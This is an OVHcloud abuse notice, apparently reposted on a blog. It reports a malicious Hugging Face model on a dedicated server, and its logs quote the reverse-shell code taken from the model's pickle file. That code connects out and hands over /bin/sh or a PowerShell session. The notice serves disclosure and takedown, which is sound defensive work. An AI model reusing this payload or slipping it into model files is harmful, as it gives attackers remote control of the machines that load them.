[Abuse #CTDVXJWMNB] Abusive use of your service ns318025.ip-37-187-153.eu


The hosting of an abusive content (Malware) on your dedicated server ns318025.ip-37-187-153.eu has been reported to or noticed by our Abuse Team.

Technical details (such as URLs) showing the aforementioned problem follow :

— start of the technical details —
— about —-

-Category: malware

—- logs follow —-

This malicious Hugging Face model:
contains code that when loaded, opens a reverse shell to You can check this with the commands:
wget https://huggingface.co/jsteel2/taiwannumberone/resolve/main/pytorch_model.bin
unzip pytorch_model.bin
cat pytorch_standard_model/data.pkl
The cat command shows:
from sys import platform
if platform != ‘win32’:
import threading
def a():
import socket, pty, os
s=socket.socket();s.connect((RHOST,RPORT));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(«/bin/sh»)
import os, socket, subprocess, threading, sys
def s2p(s, p):
while True:p.stdin.write(s.recv(1024).decode()); p.stdin.flush()
def p2s(s, p):
while True: s.send(p.stdout.read(1).encode())
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
while True:
try: s.connect((«», 4242)); break
except: pass
p=subprocess.Popen([«powershell.exe»], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE, shell=True, text=True)
threading.Thread(target=s2p, args=[s,p], daemon=True).start()
threading.Thread(target=p2s, args=[s,p], daemon=True).start()

— Forwarded email(s) —
— end of the technical details —

Your should investigate and fix this problem, as it constitutes a violation to our terms of service.

Please answer to this e-mail indicating which measures you’ve taken to stop the abusive behaviour.


The OVHcloud Trust & Safety team.

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *